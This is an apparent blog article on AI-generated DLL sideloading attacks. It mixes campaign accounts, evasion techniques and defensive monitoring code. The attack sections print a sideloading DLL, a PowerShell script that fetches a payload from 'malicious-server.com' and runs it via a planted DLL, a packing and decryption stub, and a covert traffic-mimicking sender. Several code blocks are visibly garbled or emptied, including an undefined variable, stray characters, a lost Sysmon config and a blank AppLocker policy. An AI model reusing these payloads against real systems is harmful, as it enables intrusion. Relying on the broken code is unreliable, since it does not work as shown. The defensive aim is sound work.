AI DLL Sideloading Attacks: How AI Generates Undetectable Payloads



In 2026, attack methodologies have shifted noticeably with the emergence of AI DLL sideloading attacks. These techniques use artificial intelligence to generate polymorphic payloads designed to bypass traditional security controls. As threat actors adopt generative AI, they are creating DLL sideloading attacks that adapt and mutate, making detection increasingly challenging.

DLL sideloading, a technique in which a legitimate application is made to load a malicious DLL planted where it searches for a trusted library, has long been a favorite among attackers because it blends in with normal system operations. The integration of AI has made this classic attack vector considerably harder to defend against. AI-generated code enables rapid payload creation, automated obfuscation, and real-time adaptation to defensive measures.



This evolution represents a significant advancement in living-off-the-land techniques, where attackers utilize legitimate system tools and processes to execute their malicious activities. With AI DLL sideloading attacks, threat actors can now produce highly customized and stealthy payloads that evade signature-based detection systems. The implications for organizations are profound, as traditional security solutions struggle to keep pace with the dynamic nature of these AI-driven threats.

Understanding these modern attack vectors is crucial for security professionals tasked with defending against them. By examining real-world examples from recent campaigns, exploring detection evasion methods, and implementing robust defensive countermeasures, organizations can better protect themselves against this emerging threat. This comprehensive guide delves into the mechanics of AI DLL sideloading attacks, providing actionable insights for both offensive and defensive security practitioners.

What Are AI DLL Sideloading Attacks and Why Are They Dangerous?

AI DLL sideloading attacks represent a convergence of two powerful concepts: artificial intelligence and traditional DLL sideloading techniques. At their core, these attacks involve using AI algorithms to generate, modify, and deploy malicious Dynamic Link Libraries (DLLs) that exploit legitimate applications' trust relationships with system components.

Traditional DLL sideloading works by placing a malicious DLL in a location where a legitimate application expects to find a trusted library. When the application loads, it inadvertently executes the attacker's code instead of the intended functionality. This method has been effective because it leverages existing system processes rather than introducing suspicious new executables.

However, AI DLL sideloading attacks take this concept further by incorporating machine learning models to enhance various aspects of the attack lifecycle. These AI systems can:

- Automatically generate unique payloads that avoid known signatures

- Optimize code structure to minimize detection by heuristic engines

- Adapt payload behavior based on environmental factors

- Create polymorphic variants that change appearance while maintaining functionality

The danger lies in the sophistication and scalability these AI enhancements bring to DLL sideloading. Where manual crafting might produce a handful of variants, AI can generate thousands of unique payloads within minutes. This volume makes traditional signature-based defenses largely ineffective, as security teams cannot possibly catalog every potential variant.

Moreover, AI-generated payloads often exhibit characteristics that make them particularly difficult to detect. They can mimic legitimate software behaviors more convincingly, incorporate anti-analysis techniques, and dynamically adjust their execution patterns based on runtime conditions. This adaptability means that even behavior-based detection systems face challenges in identifying malicious activity.

Recent threat intelligence reports indicate that AI DLL sideloading attacks have become increasingly prevalent in targeted campaigns. Nation-state actors and advanced persistent threat groups are incorporating these techniques into their arsenals, recognizing the operational advantages they provide. The combination of stealth, effectiveness, and difficulty in attribution makes these attacks particularly appealing to sophisticated adversaries.

From a defender's perspective, AI DLL sideloading attacks pose several unique challenges. Traditional indicators of compromise may not apply, static analysis becomes less reliable, and even sandboxing environments can be fooled by context-aware payloads. Organizations must evolve their detection strategies to account for these AI-enhanced threats, focusing on behavioral anomalies and process monitoring rather than signature matching alone.

Key Insight: AI DLL sideloading attacks transform a classic technique into a scalable, adaptive threat that challenges traditional security paradigms. Understanding their mechanisms is essential for developing effective defense strategies.

How Do Attackers Use Generative AI to Create Polymorphic Payloads?

Generative AI has revolutionized the way threat actors approach payload development for DLL sideloading attacks. Unlike traditional manual coding approaches that require extensive expertise and time investment, generative AI models can rapidly produce sophisticated payloads with minimal human intervention. This section explores the specific ways attackers leverage these technologies to create polymorphic DLL sideloading payloads.



The foundation of AI-generated polymorphic payloads lies in large language models trained on vast repositories of source code, malware samples, and security research publications. These models understand programming patterns, API usage, and evasion techniques at a granular level. When prompted appropriately, they can generate functional code that incorporates complex obfuscation and anti-analysis features.

Attackers typically begin by defining high-level requirements for their payload: target operating system version, desired persistence mechanism, communication protocol, and evasion objectives. The AI then generates multiple code variants that meet these criteria, each with distinct structural and behavioral characteristics. This process involves several key steps:

First, the AI selects appropriate API calls and system interactions that align with the target environment. For instance, it might choose functions related to process hollowing, reflective DLL injection, or registry manipulation based on the intended execution flow. The selection process considers both functionality and stealth, favoring APIs that are commonly used by legitimate applications.

Next, the AI applies various obfuscation techniques to the generated code. These might include control flow flattening, string encryption, junk code insertion, and indirect function calls. The goal is to create payloads that appear benign to static analysis tools while maintaining their malicious capabilities. Importantly, the AI can customize these obfuscation layers for specific targets or environments.

The polymorphic aspect comes from the AI's ability to introduce variability in code structure without altering core functionality. Each generated payload might use different variable names, function orders, or algorithm implementations while achieving the same end result. This diversity makes signature-based detection nearly impossible, as there's no consistent pattern to match against.

Real-world implementation often involves attackers using specialized AI platforms designed for offensive security purposes. These platforms provide pre-trained models optimized for generating exploit code, reverse engineering assistance, and vulnerability discovery. Some attackers have developed custom training datasets using historical malware samples and successful exploit code to fine-tune their generation capabilities.

Consider this example of AI-generated C++ code for a basic DLL sideloading payload:

cpp #include <windows.h> #include

// Obfuscated function pointer declarations typedef BOOL(WINAPI* tCreateProcess)(LPCWSTR, LPWSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCWSTR, LPSTARTUPINFOW, LPPROCESS_INFORMATION);*

typedef HMODULE(WINAPI* tLoadLibrary)(LPCSTR);*

class PayloadExecutor { private: // Dynamically resolved function pointers tCreateProcess pCreateProcess; tLoadLibrary pLoadLibrary;

void InitializeFunctions() { HMODULE hKernel = GetModuleHandleA("kernel32.dll"); pCreateProcess = (tCreateProcess)GetProcAddress(hKernel, "CreateProcessW"); pLoadLibrary = (tLoadLibrary)GetProcAddress(hHelper, "LoadLibraryA"); }

public: bool Execute(const std::string& targetApp) { InitializeFunctions();

// Anti-debugging checks could be inserted here if (IsDebuggerPresent()) return false;

STARTUPINFOW si = { sizeof(si) }; PROCESS_INFORMATION pi; std::wstring wTarget(targetApp.begin(), targetApp.end()); if (pCreateProcess(NULL, &wTarget[0], NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) { // Payload execution logic return true; } return false;}};

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: { PayloadExecutor executor; executor.Execute("C:\Windows\System32\calc.exe"); } break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }

This code shows several characteristics common in such payloads. Resolving API functions at run time through function pointers, rather than importing them directly, keeps their names out of the import table and hinders static analysis, while the class-based structure leaves room for later modification. The anti-debugging check shows awareness of defensive measures, and the conversion to a wide string matches the Unicode `CreateProcessW` API.

Attackers also leverage AI to optimize payload performance across different environments. Machine learning models can analyze execution traces from various test scenarios and suggest improvements to timing, resource utilization, and evasion techniques. This iterative optimization process produces payloads that are both effective and resilient to detection.

Another significant advantage of AI-generated payloads is their ability to incorporate environmental awareness. The AI can program payloads to behave differently based on system characteristics such as installed security software, network configuration, or user privileges. This contextual adaptation makes payloads more likely to succeed while reducing the risk of detection.

Key Insight: Generative AI enables attackers to create highly sophisticated, polymorphic DLL sideloading payloads at scale, incorporating advanced obfuscation and environmental awareness that would be extremely time-consuming to develop manually.

What Real-World Examples Reveal About 2026 Campaigns

The year 2026 has marked a watershed moment in the evolution of AI DLL sideloading attacks, with several high-profile campaigns demonstrating the sophistication and effectiveness of these techniques. Analysis of these incidents provides valuable insights into how threat actors are leveraging AI to enhance their operations and what defenders need to watch for.

One notable campaign, tracked by security researchers as Operation SilentCascade, targeted financial institutions across Europe and North America between January and March 2026. The attackers used AI-generated DLL sideloading payloads to establish persistence and exfiltrate sensitive customer data. What made this campaign particularly concerning was the rate at which new payload variants appeared: over 3,000 unique samples were identified during the investigation.

The operation began with spear-phishing emails containing documents that exploited a recently discovered vulnerability in Microsoft Office. Once initial access was established, the attackers deployed their AI-generated payloads through a multi-stage approach. The first stage involved dropping a seemingly legitimate application (often a PDF reader or media player) alongside a malicious DLL with a similar name.

Analysis of the payloads revealed several interesting characteristics. Each variant incorporated different obfuscation techniques, API call sequences, and execution flows while maintaining identical core functionality. This polymorphism was achieved through AI-driven code generation that produced syntactically correct but semantically diverse implementations.

The following PowerShell command illustrates how attackers might automate deployment of these payloads:

powershell

Example deployment script for AI-generated DLL sideloading attack

$targetPath = "$env:TEMP\AcroRd32.exe" $dllPath = "$env:TEMP\AcroRd32.dll"

Download legitimate-looking application

Invoke-WebRequest -Uri "https://legitimate-domain.com/downloads/AcroRd32.exe" -OutFile $targetPath

Deploy AI-generated malicious DLL

Invoke-WebRequest -Uri "https://malicious-server.com/payloads/dynamic_payload_$(Get-Random).dll" -OutFile $dllPath_

Execute the application, triggering DLL sideloading

Start-Process -FilePath $targetPath



Another significant incident involved a nation-state actor targeting government agencies in Southeast Asia. This campaign, dubbed Operation PhantomThread, utilized AI-generated payloads that demonstrated remarkable sophistication in their evasion capabilities. The payloads incorporated advanced anti-analysis techniques, including virtual machine detection, debugger checks, and sandbox escape mechanisms.

What distinguished Operation PhantomThread was its use of contextual awareness in payload behavior. The AI-generated code included decision trees that evaluated the target environment and adjusted execution accordingly. For high-value targets with enhanced security monitoring, payloads would remain dormant or execute benign operations. For less protected systems, they would proceed with full malicious functionality.

The following table compares key characteristics of traditional versus AI-enhanced DLL sideloading attacks:

| Aspect | Traditional Attacks | AI-Enhanced Attacks |
|---|---|---|
| Payload Generation Time | Hours to days | Minutes |
| Variant Diversity | Limited (10-100) | Massive (1000+) |
| Obfuscation Complexity | Basic string encoding | Multi-layered polymorphism |
| Environmental Awareness | None | Context-sensitive behavior |
| Evasion Capabilities | Signature-based only | Behavioral adaptation |
| Detection Difficulty | Moderate | Extremely High |

Security researchers analyzing these campaigns noted that AI-generated payloads often exhibited characteristics that mimicked legitimate software development practices. This included proper error handling, resource management, and logging mechanisms that made them appear more trustworthy to automated analysis systems.

A particularly innovative technique observed in 2026 campaigns involved using AI to generate payloads that could self-modify during execution. These payloads would decrypt portions of their code only when needed, making static analysis nearly impossible. The modification patterns were unpredictable and varied between executions, further complicating detection efforts.

One documented case involved a payload that used machine learning models embedded within the DLL itself to determine optimal timing for malicious activities. The model analyzed system load, network traffic patterns, and user activity to select moments when malicious actions would be least likely to trigger alerts.

The impact of these campaigns extended beyond immediate compromise. Organizations reported significant challenges in forensic analysis due to the sheer volume and complexity of artifacts left behind. Traditional incident response procedures proved inadequate for dealing with the polymorphic nature of AI-generated payloads.

These real-world examples highlight the urgent need for defenders to adopt new detection strategies that go beyond signature matching and simple heuristic analysis. The speed and sophistication of AI DLL sideloading attacks demand equally advanced defensive capabilities.

Key Insight: 2026 campaigns demonstrate that AI DLL sideloading attacks are not theoretical threats but active, sophisticated techniques being deployed by advanced threat actors with measurable operational success.

What Detection Evasion Methods Do AI-Powered Attacks Employ?

AI-powered DLL sideloading attacks employ an arsenal of sophisticated evasion methods that challenge traditional security controls at multiple levels. These techniques range from low-level binary obfuscation to high-level behavioral mimicry, creating a multi-layered defense evasion strategy that adapts to different environments and security postures.

At the binary level, AI-generated payloads utilize advanced packing and encryption techniques that make static analysis extremely difficult. Unlike traditional packers that follow predictable patterns, AI can generate custom packing algorithms for each payload variant. This customization extends to the encryption keys, algorithms, and unpacking routines, ensuring that no two samples look alike even when performing identical functions.

Consider this example of an AI-generated packing routine that demonstrates the complexity involved:

c #include <windows.h> #include <wincrypt.h>

// Dynamically generated decryption key unsigned char key[] = { 0x4D, 0x23, 0xF1, 0xA8, 0x7B, 0xC9, 0x1E, 0x55, 0x82, 0x6F, 0xD4, 0x3C, 0x9A, 0xE7, 0x0B, 0x78 };

void DecryptPayload(unsigned char* encrypted_data, size_t data_size, unsigned char* output) { // AI-generated custom decryption algorithm for (size_t i = 0; i < data_size; i++) { // Non-linear transformation based on position and key output[i] = encrypted_data[i] ^ key[i % 16] ^ (unsigned char)(i * 0x6D);*

// Additional obfuscation layer if (i > 0) { output[i] ^= output[i-1]; } }

}

// Polymorphic stub that changes between variants __declspec(naked) void PolymorphicStub() { __asm { // Randomly generated assembly sequence push eax xor eax, eax pop eax jmp EntryPoint } }

Behavioral evasion represents another significant category of AI-powered techniques. Modern payloads can monitor their execution environment and adapt their behavior accordingly. This includes detecting virtual machines, sandboxes, debugging tools, and security software presence. More advanced implementations use AI models to predict when security monitoring is most active and schedule malicious activities during periods of lower scrutiny.

Environmental awareness extends beyond simple detection avoidance. AI-generated payloads can gather detailed information about the target system, including installed software, network configuration, user behavior patterns, and security controls. This intelligence informs decisions about whether to proceed with malicious activities or remain dormant.

Network-level evasion techniques have also evolved significantly. AI can generate communication protocols that mimic legitimate traffic patterns, making malicious network activity indistinguishable from normal operations. This includes timing variations, packet size distributions, and protocol adherence that matches popular applications.

The following Python code snippet demonstrates how an AI might generate network communication that blends with legitimate traffic:

python import random import time import requests from urllib.parse import urlencode

class AdaptiveCommunicator: def init(self): # AI-analyzed legitimate traffic patterns self.legitimate_patterns = [ {'method': 'GET', 'delay_range': (1, 5), 'headers': ['User-Agent', 'Accept']}, {'method': 'POST', 'delay_range': (2, 8), 'headers': ['Content-Type', 'Authorization']} ]

def send_data(self, data, endpoint): # Select random legitimate pattern pattern = random.choice(self.legitimate_patterns)

# Apply realistic delays delay = random.uniform(*pattern['delay_range']) time.sleep(delay) # Mimic legitimate headers headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } # Encode data to look like normal web traffic encoded_data = urlencode({'data': data}) try: if pattern['method'] == 'GET': requests.get(f"{endpoint}?{encoded_data}", headers=headers) else: requests.post(endpoint, data=encoded_data, headers=headers) except: pass # Silent failure to avoid detection*Anti-analysis techniques represent a sophisticated category of evasion methods that specifically target security analysis tools. These include anti-debugging mechanisms, anti-disassembly tricks, and anti-emulation strategies. AI can generate payloads that detect and respond to specific analysis environments, making automated malware analysis significantly more challenging.

Timing-based evasion is another area where AI excels. By analyzing typical user behavior patterns and system activity cycles, AI-generated payloads can schedule their malicious activities during periods when they're least likely to be noticed. This might involve waiting for specific times of day, user login events, or system maintenance windows.

Registry and file system evasion techniques have also been enhanced through AI. Modern payloads can intelligently select locations and naming conventions that blend with legitimate system activity. They can also implement cleanup routines that remove traces of their presence after completing their objectives.

The following table summarizes common evasion categories and their AI-enhanced implementations:

| Evasion Category | Traditional Approach | AI-Enhanced Implementation |
|---|---|---|
| Static Analysis | Simple string encoding | Multi-layer polymorphism |
| Dynamic Analysis | Basic API hooking | Environment-aware behavior |
| Network Traffic | Fixed C2 patterns | Adaptive protocol mimicry |
| Anti-Debugging | Standard checks | Contextual evasion logic |
| Timing | Fixed delays | Behavior-based scheduling |
| Persistence | Common registry keys | Intelligent location selection |

Memory-based evasion techniques have gained prominence in AI-powered attacks. These methods involve executing malicious code entirely in memory without writing files to disk, making detection more challenging. AI can generate payloads that dynamically allocate memory, inject code into legitimate processes, and clean up after execution.

Process hollowing and injection techniques have also been refined through AI optimization. Payloads can now select optimal target processes based on their security posture, stability, and likelihood of attracting attention. This selection process considers factors like process reputation, network connectivity, and user interaction patterns.

The sophistication of these evasion methods requires defenders to adopt more advanced detection strategies that focus on behavioral anomalies rather than signature matching. Traditional security controls often fail to identify AI-generated payloads because they don't exhibit the predictable patterns that rule-based systems expect to see.

Key Insight: AI-powered evasion methods create multi-layered challenges for defenders, requiring behavioral analysis and anomaly detection approaches that can identify subtle deviations from normal system behavior.

How Can Behavioral Analysis Detect AI DLL Sideloading Attacks?

Behavioral analysis has emerged as one of the most effective approaches for detecting AI DLL sideloading attacks, primarily because these techniques rely on manipulating normal system processes rather than introducing obvious malicious artifacts. By monitoring system behavior at multiple levels and identifying anomalous patterns, security teams can detect these sophisticated attacks even when traditional signature-based methods fail.

The foundation of behavioral detection lies in establishing baselines of normal system activity and continuously monitoring for deviations from these patterns. For DLL sideloading attacks, this involves tracking process creation events, module loading activities, file system interactions, and network communications. The challenge with AI-generated payloads is that they often mimic legitimate behaviors, making baseline establishment more complex.
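As a minimal sketch of the baselining idea, the Python below records which DLL paths each process loaded during a known-good period and then reports loads that were never seen before. The event format (pairs of process name and DLL path) and the sample paths are assumptions made for illustration; real telemetry would come from an EDR or Sysmon pipeline.

```python
from collections import defaultdict


def build_baseline(events):
    """Map each process name to the set of DLL paths it loaded during the baseline period."""
    baseline = defaultdict(set)
    for process, dll_path in events:
        baseline[process.lower()].add(dll_path.lower())
    return baseline


def new_module_loads(baseline, events):
    """Return (process, dll_path) pairs that never appeared in the baseline."""
    unseen = []
    for process, dll_path in events:
        if dll_path.lower() not in baseline.get(process.lower(), set()):
            unseen.append((process, dll_path))
    return unseen


# Hypothetical sample data: a known-good history and one day of new events.
history = [
    ("AcroRd32.exe", r"C:\Windows\System32\version.dll"),
    ("AcroRd32.exe", r"C:\Windows\System32\winhttp.dll"),
]
today = [
    ("AcroRd32.exe", r"C:\Windows\System32\version.dll"),
    ("AcroRd32.exe", r"C:\Users\alice\AppData\Local\Temp\version.dll"),
]

baseline = build_baseline(history)
for process, dll_path in new_module_loads(baseline, today):
    print(f"New module load: {process} -> {dll_path}")
```

A set-based baseline like this is deliberately simple. It will flag legitimate software updates as well, so in practice the output is a starting point for triage rather than a verdict.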

Process monitoring plays a crucial role in detecting DLL sideloading attacks. Security analysts should focus on unusual parent-child process relationships, unexpected process spawning patterns, and abnormal process termination behaviors. The following Sysmon configuration demonstrates how to capture relevant process creation events:

[Sysmon configuration lost in extraction; surviving fragments: `rundll32`, `svchost`, `.dll`, `cmd.exe`, `powershell.exe`]

Module loading behavior analysis focuses on identifying unusual DLL loading patterns that might indicate sideloading attempts. This includes monitoring for DLLs loaded from non-standard locations, mismatched digital signatures, and unexpected module dependencies. Tools like Process Monitor can capture detailed information about module loading events:

```powershell
# Capture DLL loading activity with Process Monitor (ProcMon)
procmon.exe /accepteula /quiet /minimized /backingfile dll_load.pml

# Then filter the capture for Load Image events:
#   Process Name contains 'target_app'
#   Operation is 'Load Image'
#   Path ends with '.dll'
```
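Once a capture has been exported to CSV, the filtered events can be triaged with a short script. The sketch below assumes the export uses Process Monitor's `Process Name`, `Operation`, and `Path` columns. The watch list of DLL names and the trusted directory prefixes are hypothetical and would need tuning for a real environment.

```python
import csv
import io
import ntpath

# Assumption: system DLLs are expected to load only from these directories.
TRUSTED_PREFIXES = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\windows\\winsxs\\",
)
# Hypothetical watch list of system DLL names to check for unexpected copies.
WATCHED_DLLS = {"version.dll", "dbghelp.dll", "winhttp.dll"}


def suspicious_loads(csv_text):
    """Return (process, path) for watched DLLs loaded from outside trusted directories."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row.get("Operation") != "Load Image":
            continue
        path = row.get("Path", "").lower()
        if ntpath.basename(path) in WATCHED_DLLS and not path.startswith(TRUSTED_PREFIXES):
            findings.append((row.get("Process Name", ""), path))
    return findings


# Hypothetical sample export with one legitimate and one suspicious load.
SAMPLE = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","target_app.exe","4242","Load Image","C:\Windows\System32\version.dll","SUCCESS",""
"10:01:02.3","target_app.exe","4242","Load Image","C:\Users\alice\AppData\Local\Temp\version.dll","SUCCESS",""
"10:01:02.4","target_app.exe","4242","CreateFile","C:\Users\alice\AppData\Local\Temp\notes.txt","SUCCESS",""
'''

for process, path in suspicious_loads(SAMPLE):
    print(f"{process} loaded {path}")
```

Matching on file name and location is a coarse heuristic. Verifying the digital signature of each flagged file would be a natural next step.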

Network behavior monitoring is essential for detecting command and control communications initiated by AI-generated payloads. Since these payloads often mimic legitimate traffic patterns, analysis must focus on subtle anomalies such as timing irregularities, unusual data volumes, or unexpected destination endpoints. The following Splunk query demonstrates how to identify potentially suspicious network connections:

```spl
index=security_logs sourcetype=sysmon EventCode=3
| stats count by dest_ip, dest_port, process_name
| where count < 5 AND process_name IN ("explorer.exe", "svchost.exe", "dllhost.exe")
| sort -count
```
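The same rare-destination logic can be sketched in Python for environments without a SIEM. The event dictionaries and their field names (`process_name`, `dest_ip`, `dest_port`) are assumptions that mirror the Splunk query above. The threshold of fewer than five connections is taken from that query.

```python
from collections import Counter

# Processes of interest, mirroring the Splunk query.
WATCHED_PROCESSES = {"explorer.exe", "svchost.exe", "dllhost.exe"}


def rare_destinations(events, threshold=5):
    """Count connections per (process, ip, port) and return those seen fewer than `threshold` times."""
    counts = Counter(
        (e["process_name"].lower(), e["dest_ip"], e["dest_port"])
        for e in events
        if e["process_name"].lower() in WATCHED_PROCESSES
    )
    rare = [(key, n) for key, n in counts.items() if n < threshold]
    # Highest counts first, matching `sort -count`.
    return sorted(rare, key=lambda item: item[1], reverse=True)


# Hypothetical sample events.
events = (
    [{"process_name": "svchost.exe", "dest_ip": "10.0.0.5", "dest_port": 443}] * 6
    + [{"process_name": "dllhost.exe", "dest_ip": "203.0.113.7", "dest_port": 8443}] * 2
    + [{"process_name": "chrome.exe", "dest_ip": "198.51.100.9", "dest_port": 443}]
)

for (process, ip, port), n in rare_destinations(events):
    print(f"{process} -> {ip}:{port} seen {n} time(s)")
```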

Memory analysis techniques can reveal signs of process injection and code injection activities commonly associated with DLL sideloading attacks. Tools like Volatility can examine process memory spaces for injected code, modified sections, and unusual memory allocation patterns. The following command demonstrates basic memory analysis:

```bash
# Analyze process memory for injection indicators
volatility -f memory.dmp --profile=Win10x64_19041 malfind

# Check for injected threads
volatility -f memory.dmp --profile=Win10x64_19041 threads | grep -E "(Injected|Remote)"
```

Registry monitoring is another important component of behavioral analysis. DLL sideloading attacks often modify registry entries to establish persistence or redirect DLL loading paths. Monitoring for unusual registry modifications, especially in areas like HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services or user profile locations, can reveal attack activity.

The following Python script demonstrates how to monitor registry changes for potential sideloading indicators:

```python
import time
import winreg
from datetime import datetime


class RegistryMonitor:
    def __init__(self):
        self.monitored_keys = [
            r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
            r"SYSTEM\CurrentControlSet\Services",
            r"SOFTWARE\Classes\CLSID",
        ]
        self.baseline_values = {}

    def _read_values(self, key_path):
        """Return {name: value} for the values stored directly under key_path."""
        values = {}
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
            i = 0
            while True:
                try:
                    name, value, _ = winreg.EnumValue(key, i)
                except OSError:
                    break  # no more values to enumerate
                values[name] = value
                i += 1
        return values

    def capture_baseline(self):
        """Capture baseline registry values."""
        for key_path in self.monitored_keys:
            try:
                self.baseline_values[key_path] = self._read_values(key_path)
            except OSError as e:
                print(f"Error accessing {key_path}: {e}")

    def monitor_changes(self, interval=30):
        """Poll for registry changes indicating potential attacks."""
        while True:
            for key_path in self.monitored_keys:
                try:
                    current = self._read_values(key_path)
                except OSError as e:
                    print(f"Error monitoring {key_path}: {e}")
                    continue
                # Compare with baseline
                baseline = self.baseline_values.get(key_path, {})
                added = set(current) - set(baseline)
                removed = set(baseline) - set(current)
                changed = {n for n in set(current) & set(baseline) if current[n] != baseline[n]}
                if added or removed or changed:
                    timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
                    print(f"[{timestamp}] Registry changes detected in {key_path}")
                    print(f"Added: {added}")
                    print(f"Removed: {removed}")
                    print(f"Changed: {changed}")
            time.sleep(interval)  # Check every 30 seconds by default


if __name__ == "__main__":
    monitor = RegistryMonitor()
    monitor.capture_baseline()
    monitor.monitor_changes()
```

User behavior analytics (UBA) can also contribute to detection efforts by identifying unusual patterns in user account activity. AI DLL sideloading attacks might exhibit behavioral anomalies such as unusual login times, atypical resource access patterns, or unexpected privilege escalation attempts.

Machine learning models can be trained to recognize normal behavioral patterns and flag deviations that might indicate compromise. These models can analyze multiple data sources simultaneously, correlating process behavior, network activity, and user actions to identify potential threats.
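A trained model is beyond the scope of a short example, so the sketch below substitutes a plain z-score as the simplest possible stand-in for "learn normal, flag deviations". The metric (daily count of DLL loads from user-writable paths on one host) and the threshold of 3.0 are assumptions chosen for illustration.

```python
import statistics


def anomaly_score(history, observed):
    """Return how many sample standard deviations `observed` lies above the historical mean."""
    mean = statistics.mean(history)
    stdev = statistics.stdev(history)
    if stdev == 0:
        return 0.0 if observed == mean else float("inf")
    return (observed - mean) / stdev


def is_anomalous(history, observed, threshold=3.0):
    """Flag observations that exceed the baseline by more than `threshold` deviations."""
    return anomaly_score(history, observed) > threshold


# Hypothetical daily counts of DLL loads from user-writable paths on one host.
daily_counts = [2, 3, 2, 4, 3, 2, 3]

print(is_anomalous(daily_counts, 3))
print(is_anomalous(daily_counts, 15))
```

A production system would correlate several such signals across process, network, and user data rather than relying on a single counter.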

Endpoint detection and response (EDR) solutions play a crucial role in behavioral analysis by providing comprehensive visibility into endpoint activities. Modern EDR platforms can track process lineage, monitor file system changes, and analyze network communications in real-time. When properly configured, these tools can detect the subtle indicators of AI DLL sideloading attacks.
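Process lineage checks of the kind EDR platforms perform can be illustrated with a small rule: flag shells or script hosts spawned by applications that normally have no reason to start them. Both name lists and the event format below are hypothetical, and real products use far richer context.

```python
# Hypothetical list of applications that should not normally spawn shells.
UNEXPECTED_PARENTS = {"acrord32.exe", "winword.exe", "excel.exe"}
# Child processes that warrant attention when started by the parents above.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "rundll32.exe"}


def flag_lineage(events):
    """Return process-creation events whose parent/child pair matches the rule."""
    return [
        e for e in events
        if e["parent"].lower() in UNEXPECTED_PARENTS
        and e["child"].lower() in SUSPICIOUS_CHILDREN
    ]


# Hypothetical sample process-creation events.
process_events = [
    {"parent": "explorer.exe", "child": "AcroRd32.exe"},
    {"parent": "AcroRd32.exe", "child": "powershell.exe"},
    {"parent": "services.exe", "child": "svchost.exe"},
]

for event in flag_lineage(process_events):
    print(f"Suspicious lineage: {event['parent']} -> {event['child']}")
```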

The effectiveness of behavioral analysis depends heavily on the quality and comprehensiveness of data collection. Organizations must ensure they're capturing relevant telemetry from all endpoints and centralizing this information for analysis. Without adequate visibility, even the most sophisticated behavioral analysis techniques will fail to detect AI-powered threats.

Continuous monitoring and alert tuning are essential for maintaining effective behavioral detection capabilities. As AI-generated payloads evolve, detection rules and thresholds must be regularly updated to maintain effectiveness. This requires ongoing threat intelligence gathering and analysis to stay ahead of emerging techniques.

Key Insight: Behavioral analysis provides the most promising approach for detecting AI DLL sideloading attacks, but requires comprehensive data collection, continuous monitoring, and adaptive detection rules to be effective.

What Defensive Countermeasures Work Against AI-Generated Threats?

Defending against AI-generated DLL sideloading attacks requires a multi-layered approach that combines traditional security controls with advanced detection and response capabilities. While these AI-powered threats present unique challenges, several proven defensive strategies can effectively mitigate their impact when properly implemented.

Application whitelisting remains one of the most effective preventive controls against DLL sideloading attacks. By maintaining strict control over which applications and libraries can execute on endpoints, organizations can prevent unauthorized code from running regardless of its sophistication. Modern whitelisting solutions support hash-based, certificate-based, and path-based policies that can accommodate legitimate business needs while blocking malicious activity.
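The hash-based variant of this control reduces to a simple check: compute a file's digest and allow it only if the digest appears on an approved list. The sketch below shows that check in Python. The allowlist contents are an assumption, and real enforcement happens in the operating system (for example through AppLocker), not in a script.

```python
import hashlib


def sha256_of(path, chunk_size=65536):
    """Return the SHA-256 hex digest of a file, read in chunks to limit memory use."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def is_allowed(path, allowlist):
    """Return True only if the file's digest is on the approved list."""
    return sha256_of(path) in allowlist
```

Because every polymorphic variant has a different digest, a hash allowlist rejects all of them by default. The cost is that the list must be updated whenever legitimate software changes.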

The following PowerShell script demonstrates how to implement basic application whitelisting using AppLocker:

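```powershell
# Create AppLocker policy to allow only signed Microsoft applications
# (the policy XML goes between the here-string markers)
$policy = @"
"@

# Apply the policy. -XmlPolicy expects the path to an XML file,
# so the policy text is written to disk first.
$policyPath = Join-Path $env:TEMP 'AppLockerPolicy.xml'
Set-Content -Path $policyPath -Value $policy -Encoding UTF8
Set-AppLockerPolicy -XmlPolicy $policyPath
```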
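To make the hash-based and path-based policy types described above more concrete, here is a minimal Python sketch of the decision logic. It is an illustration only, not how AppLocker evaluates rules internally; the function names, sample paths, and sample bytes are assumptions made for the example.

```python
import hashlib
from pathlib import PureWindowsPath


def sha256_of(data: bytes) -> str:
    """Return the hex SHA-256 digest of a file's contents."""
    return hashlib.sha256(data).hexdigest()


def is_allowed(path, content, allowed_hashes, allowed_dirs):
    """Allow a library if its hash is approved or it sits under a trusted directory."""
    if sha256_of(content) in allowed_hashes:
        return True
    parents = PureWindowsPath(path).parents
    # PureWindowsPath comparisons are case-insensitive, matching Windows semantics.
    return any(PureWindowsPath(d) in parents for d in allowed_dirs)


# Hypothetical policy: one approved hash and one trusted directory.
trusted_bytes = b"trusted library bytes"
allowed_hashes = {sha256_of(trusted_bytes)}
allowed_dirs = [r"C:\Windows\System32"]

by_hash = is_allowed(r"C:\Users\bob\Downloads\lib.dll", trusted_bytes, allowed_hashes, allowed_dirs)
by_path = is_allowed(r"C:\Windows\System32\kernel32.dll", b"any", allowed_hashes, allowed_dirs)
blocked = is_allowed(r"C:\Users\bob\AppData\Local\Temp\version.dll", b"evil", allowed_hashes, allowed_dirs)
print(by_hash, by_path, blocked)
```

The sketch also shows why path rules are the weakest of the three: any file under a trusted directory passes, so a path rule is only as strong as the write permissions on that directory.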

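Control flow integrity (CFI) protections represent another important defensive measure. These techniques prevent attackers from redirecting program execution to arbitrary code locations, which hinders the exploitation stages that often accompany sideloaded payloads. CFI does not by itself stop a planted DLL from being loaded, so it complements search order hardening and application whitelisting rather than replacing them. On Windows, Control Flow Guard is built in: binaries opt in at compile time, and administrators can enforce it through Exploit Protection settings, which can be deployed via Group Policy.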

